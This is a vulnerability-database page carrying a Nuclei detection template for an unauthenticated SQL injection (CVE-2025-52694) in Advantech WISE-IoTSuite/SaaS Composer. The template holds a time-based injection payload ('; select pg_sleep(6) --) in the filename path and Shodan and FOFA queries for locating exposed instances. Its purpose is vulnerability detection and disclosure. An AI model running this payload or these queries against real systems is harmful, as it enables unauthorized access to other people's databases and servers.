Lucene search
K

Advantech WISE-IoTSuite/SaaS - SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated SQL injection in Advantech WISE-IoTSuite SaaS via filename param; may enable RCE.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-52694
12 Jan 202602:27
attackerkb
Circl
CVE-2025-52694
12 Jan 202603:46
circl
CNNVD
Advantech多款产品 安全漏洞
12 Jan 202600:00
cnnvd
CVE
CVE-2025-52694
12 Jan 202602:27
cve
Cvelist
CVE-2025-52694 Execution of arbitrary SQL commands
12 Jan 202602:27
cvelist
GithubExploit
Exploit for CVE-2025-52694
12 Jan 202610:01
githubexploit
EUVD
EUVD-2026-1958
12 Jan 202602:27
euvd
NVD
CVE-2025-52694
12 Jan 202603:16
nvd
OSV
CVE-2025-52694
12 Jan 202603:16
osv
Positive Technologies
PT-2026-1814
12 Jan 202600:00
ptsecurity
Rows per page
id: CVE-2025-52694

info:
  name: Advantech WISE-IoTSuite/SaaS - SQL Injection
  author: Loi Nguyen Thang
  severity: critical
  description: |
    Advantech WISE-IoTSuite/SaaS Composer suffers from an unauthenticated SQL Injection vulnerability due to the unsafe use of the `filename` parameter within the URL path in PostgreSQL queries. Remote attackers can exploit this flaw by injecting SQL code (such as the use of `pg_sleep` for time delays) to verify the vulnerability, and may gain further impact such as Remote Code Execution (RCE) depending on the privileges granted to the database user.
  impact: |
    Successful exploitation could allow an attacker to dump the database, modify data, or execute remote commands on the underlying server.
  remediation: |
    Apply the latest security patches provided by Advantech or sanitize the `filename` input parameter to prevent SQL injection.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-52694
    - https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001
    - https://github.com/Winz18/CVE-2025-52694-POC
    - https://nvd.nist.gov/vuln/detail/CVE-2025-52694
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-52694
    epss-score: 0.37867
    epss-percentile: 0.98364
    cwe-id: CWE-89
  metadata:
    verified: true
    shodan-query: title:"SaaS Composer"
    fofa-query: title="SaaS Composer"
  tags: cve,cve2025,sqli,advantech,iot,saas-composer,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        words:
          - "SaaS Composer"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/displays/nuclei_check.json'; select pg_sleep(6) --?org_id={{org_id}}"

    payloads:
      org_id:
        - 1
        - 2
        - 3
        - 4
        - 5

    attack: clusterbomb
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration>=6'
        condition: and
# digest: 4a0a004730450220399a9d3a8636cf3bd96c567570a860eec38bbc5a010144551cb6a7417a4b8cf4022100903ef6f35592b2887c75f064c7ab3796eda89055b9206ce90748afc7192614b5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.8 - 10
EPSS0.37867
SSVC
10